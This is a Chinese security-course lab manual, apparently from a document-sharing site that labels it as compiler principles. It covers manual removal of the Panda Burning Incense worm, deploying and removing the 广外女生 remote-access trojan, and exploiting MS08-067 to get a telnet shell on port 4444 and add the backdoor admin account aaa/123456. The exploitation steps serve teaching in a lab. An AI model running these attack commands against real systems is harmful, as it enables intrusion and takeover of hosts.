《编译原理测试实验》由会员分享,可在线阅读,更多相关《编译原理测试实验(14页珍藏版)》请在金锄头文库上搜索。
1、实验五 计算机病毒和木马实验内容一:熊猫烧香病毒手工清除实验【实验目的】1)了解熊猫烧香病毒发作原理2)学习手工查杀病毒过程【实验原理】熊猫烧香是一种蠕虫病毒的变种,而且是经过多次变种而来的,由于中毒电脑的可执行文件会出现“熊猫烧香”图案,所以也被称为 “熊猫烧香”病毒。但原病毒只会对 EXE图标进行替换,并不会对系统本身进行破坏。而大多数是中等病毒变种,用户电脑中毒后可能会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。同时,该病毒的某些变种可以通过局域网进行传播,进而感染局域网内所有计算机系统,最终导致企业局域网瘫痪,无法正常使用,它能感染系统中 exe,com,pif,src,ht
2、ml,asp 等文件,它还能终止大量的反病毒软件进程并且会删除扩展名为 gho 的备份文件【实验环境】目标机:2003 操作系统工具: C:tools熊猫烧香手工清除实验【实验步骤】一、运行熊猫烧香病毒1.1 打开 C:tools熊猫烧香手工清除实验文件夹,里面有 2 个文件,这就是熊猫烧香的病毒的全部样本。1.2 我们直接双击运行 setup.exe。二、手工清除病毒2.1 我们双击运行程序后,发现任务管理器打不开。启动任务管理器观察现象。2.2 我们查看系统内存,排查可疑进程,再 cmd 下输入命令 tasklist /svc 查看, 这个命令是查看系统内所有的进程,截图:发现进程 spo
3、clsy.exe 比较可疑,为什么判断这个可疑,第一我们可以去百度这个进程,第二,凭借经验,因为很多程序的进程名称都是固定的,第三,通过三方面进程查看软件,软件会直观的告诉我们哪个进程是可疑的。2.3 确认可疑进程后,我们先在 cmd 下 taskkill /f /im PID,这条命令意思是结束某个pid 对应的进程,我们来结束可疑进程。截图:2.4 查看启动项,点击开始-运行-msconfig,msconfig 即系统配置实用程序,是Microsoft System Configuration 的缩写。是在开始菜单里运行中输入然后确认就可以找到程序开启或者禁用,可以帮助电脑禁止不需要运行的
4、程序,这样可以加快你的电脑运行,它的功能主要有 1、管理系统启动项,有的软件在操作系统启动时也随之启动,占用系统资源(CPU、内存等),这里可以由你来决定哪些软件可以启动,哪些不可以启动。2、管理系统服务, 例如打印机、注册表等等的服务。3、可以看到BOOT.ini、win.ini、system.ini 等我们可以看到恶意病毒的位置和注册表的信息。截图:2.5 我门记下病毒的注册表位置和命令位置,分别是HKEY_CURRENT_USERSOFTWAERMicrosoftwindowsCurrentVerstionRUN 和C:windowssystem32driversspoclsv.exe,
5、我们在开始-运行-输入 regedit.exe 进入注册表,找到病毒的注册表位置并删除。2.6 根据注册表信息,我们得知这个名称是 svcshar 截图:删除注册表项。我们要进去 C:windowssystem32drivers目录将主文件 spoclsv.exe 删除,首先我们 cmd 进入 c:windowssystem32drivers 下输入 dir spoclsv.exe。截图:2.7 我们用 del /f spoclsv.exe 彻底删除,del /f 的意思是强制删除。2.8 我们要检查是否有感染和隐藏的文件,进入 CMD 在 C 盘下面输入:dir /ah,这个命令的意思是显示
6、当前目录的隐藏文件和隐藏文件夹。截图:2.9 我们会发现有隐藏的病毒和文件,我们继续清除,在 cmd 下运行 attrib -r -h -s autorun.inf 和 attrib -r -h -s setup.exe,attrib -r -h s命令的意思是去除只读、系统、隐藏文件属性。2.10 清除后,我们用 del /f 来删除文件。2.11 至此,熊猫烧饼病毒清除完毕2.12.总结:通过该样本熊猫烧香病毒查杀,我们能够大致了解一个病毒感染主机后可能会在主机上做的一些改变,以及如何查杀病毒的一般手段或步骤。同时也能分析出一般病毒所具备的一些功能如:躲避查杀能力、开机启动技术、后门技术等
7、。实验内容二:广外女生的使用与手工清除【实验目的】1) 了解广外女生的使用与清除【实验原理】1) 广外女生是广东外语外贸大学广外女生网络小组的处女作,也是一个远程控制软件,破坏性很大,远程上传、下载、删除文件、修改注册表等自然不在话下。其可怕之处在于广外女生服务端被执行后,会自动检查进程中是否含有金山毒霸、天网等字样,如果发现就将该进程终止,也就是说使防火墙完全失去作用!【实验环境】攻击机:192.168.1.2 Windows7目标机:192.168.1.3 Windows server 2003【实验步骤】一、广外女生的使用1.1 打开桌面 tools广外女生的使用与手工清除文件夹下的 g
8、wg.exe,单击服务端设置。将安装时的错误提示中,输入自己的“学号+姓名+安装错误”。1.2 这里使用自定义,单击生成服务端,则会在当前目录下生成服务端木马程序GDUFS.exe。1.3 双击桌面上的共享快捷方式,打开共享文件夹,将在 gwgirl 文件夹下生成的木马程序GDUFS.exe 拷贝到共享文件夹下。截图:1.4 切换到目标机,在 Windows server 2003 上双击桌面上的共享快捷方式,打开共享文件夹,将木马程序 GDUFS.exe 复制到此文件夹下。切换到目标机,使用同样的方式打开操作机的共享文件夹,将 GDUFS.exe 复制到桌面上。1.5 双击运行木马程序,弹出
9、提示。截图:1.6 切换到攻击机,单击添加主机选项卡,设置起始和终止 IP,验证密码为空,单击开始搜索,搜索到目标主机。截图:1.7 在文件共享选项卡下,可以对目标机上的目录和文件进行相关操作,如上传、下载文件,打开选定文件,新建、删除文件夹,设置文件或文件夹属性等等。1.8 向目标主机发送一条信息“学号+姓名”,发送前可以进行预览。发送后,到目标机会发现弹出了发送的信息,截图:1.9 在远程注册表选项卡下,可以对目标机的注册表进行相关操作,如新建主键、删除主键、新建字符键值、新建 DWORD 键值、删除键值等等。1.10 在进程管理(Win9x)选项卡下,可以查看和终止目标机的进程。二、 广
10、外女生的清除2.1 在运行中输入 regedit 打开注册表编辑器,找到如下注册项: HKEY_LOCAL_MACHINEsoftwareclassesexefileshellopencommand。先不要修改,因为如果这时修改注册表的话,DIAGCFG.EXE 进程仍然会立即把它改回来。2.2 打开“任务管理器”,找到 DIAGCFG.EXE 进程,选中它按“结束进程”来关掉这个进程。注意:一定也不要先关进程再打开注册表,否则执行 regedit.exe 时又会启动DIAGCFG.EXE。前功尽弃!2.3 把 HKEY_LOCAL_MACHINEsoftwareclassesexefiles
11、hellopencommand的键值由原来的 C:winntsystem32DIAGCFG.EXE %1 %*改为%1 %* 。截图:2.4HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices,删除其中名称为“Diagnostic Configuration”的键值。截图:2.5 这时就可以删除 C:WindowsSystem32 文件夹下的木马程序 DIAGCFG.EXE 了,切记不可先删除这个文件,否则,就无法在系统中运行任何可执行文件了。2.6 这是到攻击机重新搜索目标机,发现搜索不到。实验内容:MS080
12、67 利用方法【实验目的】1)掌握利用 MS08067 远程溢出工具发送特殊构造的数据包,使目标主机产生溢出,然后执行shellcode 代码, ,打开目标主机端口,使用 telnet 连接目标端口,获得系统权限。【实验原理】MS08-067 远程溢出漏洞的原因是由于 Windows 系统中 RPC 存在缺陷造成的,Windows 系统的 Server 服务在处理特制 RPC 请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的 RPC 请求触发这个溢出,如果受影响的系统收到了特制伪造的 RPC 请求,可能允许远程执行代码,导致完全入侵用户系统,以 SYSTEM 权限执行任意指令并获取数据,
13、并获取对该系统的控制权,造成系统失窃及系统崩溃等严重问题。【实验环境】目标机:192.168.1.3工具: C:toos MS08067 利用方法【实验步骤】一、运行 MS08067 远程溢出软件1.1 单击“开始”- “运行” ,在弹出的对话框中输入“cmd”, 打开命令行界面。1.2 在命令行界面输入”cd C:toolsMS08067 利用方法” 。 1.3 输入命令”MS08067.exe” ,显示工具使用方法。1.4 输入命令“MS08067.exe 192.168.1.3”,工具向远程主机 192.168.1.3 发送一串特殊构造得数据包,使目标主机产生内存益处,程序跳转到 she
14、llcode 代码处执行,shellcode 代码在目标主机上开启 4444 端口,等待连接。二、连接远程主机并添加用户2.1 输入命令“telnet 192.168.1.3 4444”。截图:2.2 成功连接目标主机,输入命令“ipconfig”,查看远程主机 IP 信息。截图:2.3 输入命令“net user aaa 123456 /add”在远程主机上添加帐户 aaa,密码:123456。2.4 输入命令“net localgroup administrators aaa /add”把帐户 aaa 添加到管理员组。2.5 输入命令“netstat -an”查看远程主机开放端口,发现 3389 已经打开。截图:2.6 输入命令“net user aaa”查看帐户 aaa 是否已经输入管理员组。截图:2.7 单击“开始”- ”运行“-输入命令”mstsc“,打开远程桌面窗口。2.8 输入账号“aaa “和密码”123456“,登陆目标主机。2.9 使用 aaa 账号登陆成功。截图:【实验思考】1了解 MS08067 漏洞。如何利用命令查看系统详细用户的信息 (A)A:net userB:net user aaa /addC: net user 用户名D:以上说法都正确
